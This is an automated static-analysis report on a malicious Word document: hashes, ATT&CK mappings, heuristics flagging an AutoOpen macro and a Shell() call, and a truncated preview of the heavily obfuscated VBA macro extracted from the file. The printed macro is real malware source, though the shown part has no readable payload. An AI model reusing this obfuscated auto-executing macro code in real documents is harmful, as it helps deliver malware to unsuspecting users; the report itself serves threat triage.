Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6636f2e607612a33…

MALICIOUS

Office (OLE)

Size: 289.0 KB
Created: 2018-02-28 14:49:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 0a0bb5fd6f23776d51eb66bb504039f9
SHA-1: 10ad48d115c158ddec0ec7a8e63076f2eaa945ce
SHA-256: 6636f2e607612a337ae6e2ec2e045c87716ae04c2894e5a920777113dad1eb42
Risk Score: 144

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and uses a Shell() call, indicating an attempt to execute arbitrary code. The obfuscated nature of the script prevents a precise determination of its payload, but it is highly likely designed to download and execute a second-stage payload. The presence of the 'macros.bas' artifact is noted as an IOC.

Heuristics (6)

  • VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 94238 bytes
SHA-256: 559055e74ef4b21d34b9bb597fc7e1c1aa9201268885bd0ec5ce6369cd58625b
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 31 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "wdDAFczsfZSVz"
Sub ikBIHWYMQwK()
   On Error Resume Next
   While VzkQNXhshcMzh < lEwMCHm
      Set NZajREUjNEpKHw = OMvoFA
      YDarkU = 3065290 + Round(wCHZl) - 2159260 * Cos(8079823) / FcXzOHHWIn + Chr(iAHThvHBXIZTAT)
      ImDhMw = ipLhDrRvD / wYhCojaiiJS
   Wend
   Select Case fIXiEwVTa
      Case 5267799
         JSRHzrPkbFqXbl = UDcDhm
         MKCKZm = 3602025
      Case 5114345
         JVYYkXcbmOZ = PplvsziSrWtND
         HEoScR = Rnd(149569)
      Case 4184486
         CDMWzaARSMO = Atn(9425912)
         ROhpoIsmb = Fix(2202440 + 4142236 * 5850665 * XmUmIquI)
   End Select
   For sfbjrqFaAoI = 7375511 To Zlncsduarrsh
      OzjEX = 562848 - hWBOHRB
      Select Case AKjVdjNiwfw
         Case 3168052
            IAniznc = ChrW(twQFZG - CSng(jZVbc))
            ZjKWEUB = hYZmzYV
         Case 2649243
            IdZZHOQPDdJ = ChrB(ZKXoAjTdMvTbtL)
            rTZhhVtMz = 538206
      End Select
      SSuGArrOINCz = Sitn - 9748244
      For CkTNKzfvrZwd = cdfwZlNQBjFuck To 5935044
         JoVbs = (6014713 * 7207792 + znEHXbUKWv * Sin(ldPdMlY - CDbl(BOSiN) * 144092 * hkaCCzrFwljFt) / 5160171 * CLng(2773161 - CDate(YjVtauLJpUfkM)) / FrHftjjTsRt + 4620639 / (rfjiZmTu / sHRmZ - MiSHsSjp / Int(9667180 - Round(jiLEnEz) + 459467 / 5649112)))
      Next
   Next
End Sub
Function TRIDDPYNCn()
On Error Resume Next
Eiiuccii = "BzoIFJWVmMCZKuTrav%!!%3ravLRNzcmaTIzuYn"
HITcA = oBtSLjGH = (6144964 * 9483820 + AEUZjQwkQvKwH * Sin(EIGcickP - CDbl(HJzjJb) * 5355798 * OiZdhTNTaY) / 7635028 * CLng(994807 - CDate(iFmwGbAfB)) / KkwNQjhmJ + 7743216 / (vRhpXosI / DwKkd - MkDzb / Int(9235500 - Round(JPskGzm) + 8581122 / 7449541)))
ktspZj = QCinEIjmHW = (9416192 * 3488292 + aLkLUzj * Sin(MYiISw - CDbl(ivWLQStiuRIb) * 3771446 * UZQrBSY) / 4219746 * CLng(7218954 - CDate(vDUEdzim)) / wELAlBv + 6291813 / (puLVPwszSR / iNMJDQMz - EvmWQWIIZipG / Int(7272359 - Round(jqGZoXMihNUhjr) + 393560 / 9331391)))
jsAhwR = iuivbdfghnkjgyugjn(Eiiuccii, 14, 11)
aLHHilK = "wODpzwJqRJkq!%2raGTwOMBCTpnvMKEDLZtNt"
FDUVpvbu = ZmmCancz = (2401357 * 901495 + kDAnZJZzDQ * Sin(vAjUGzunSTqXw - CDbl(LRjzEPSGWMY) * 6632655 * fKYuNBhqmV) / 1209175 * CLng(6432348 - CDate(EYmHujEHOs)) / zzBYpdUvXUOdt + 4891215 / (VOpYvaRZKu / OSsdVRSf - OAJBJBLJKqvsiR / Int(2057742 - Round(RqzSfZriVPCCu) + 9903821 / 9531768)))
uNIdz = OcOVFoP = (8799575 * 2885466 + PUwbjA * Sin(nDbUMQoIiju - CDbl(IPKskiFCpldbDD) * 4549418 * XftiBU) / 1295311 * CLng(9244722 - CDate(qBMZMaIVu)) / sEbOwa + 9610886 / (BZARJsflzmLwn / OWudtd - LVFJzfEwRw / Int(1597243 - Round(cEWWY) + 8466317 / 3713064)))
VwcRzMVB = iuivbdfghnkjgyugjn(aLHHilK, 21, 5)
WLnKlzXD = "RnCCEJhK% tes&&sFXOonskjpJJwZWzjpmcWDw"
wicno = tdnWBPkJjJC = (9147015 * 2500840 + SIPCiOvkGhHZ * Sin(BJXQatEFQfa - CDbl(rbTlokLbXAWYEG) * 1661413 * IWFOchjALtcB) / 1590404 * CLng(6022952 - CDate(coHqm)) / wSzvwKAmzL + 3773074 / (TwuaMTKsSauH / Tswtjw - WIKEISdX / Int(6731981 - Round(LhIQoiH) + 459162 / 5538855)))
jKrNN = jtKXXpliRBsP = (2912365 * 680637 + KmpStpm * Sin(EOMzti - CDbl(rrGHjc) * 9782366 * hShwGhVwSFBi) / 9249729 * CLng(3397104 - CDate(jztkFIKqsAH)) / BIHTmL + 9872987 / (zMqjci / utrAOaHX - qssiXc / Int(7870496 - Round(wXUnLlPSwJkWJM) + 1641376 / 4507105)))
UNODCZfDXrc = iuivbdfghnkjgyugjn(WLnKlzXD, 23, 8)
qPWsKub = "EhjDzRiqjOGBwzzwXoTiZbOwchns"
LUQLANMB = SzilFEATOwz = (7153482 * 1659174 + qujvzp * Sin(KzsrrNDzvrsp - CDbl(uKjRopTwJDp) * 6869902 * CzXDqiXwIB) / 7332964 * CLng(8770559 - CDate(rzWSGEv)) / OfOPHHVoA + 8889553 / (HPKFZ / BOSnmJtXZzVaq - loDoRIojXBIHHi / Int(7286427 - Round(hswaFqdkcWUrhJ) + 7932 / 2719821)))
YICiPQtOE = zSTLWnQ = (735170 * 3438582 + QfiCLlaPdiPru * Sin(SLvnwBN - CDbl(uwJQS) * 7714849 * EfWnzMF) / 9566051 * CLng(3921203 - CDate(GHtWkv)) / XHsKsd + 1462422 / (
... (truncated)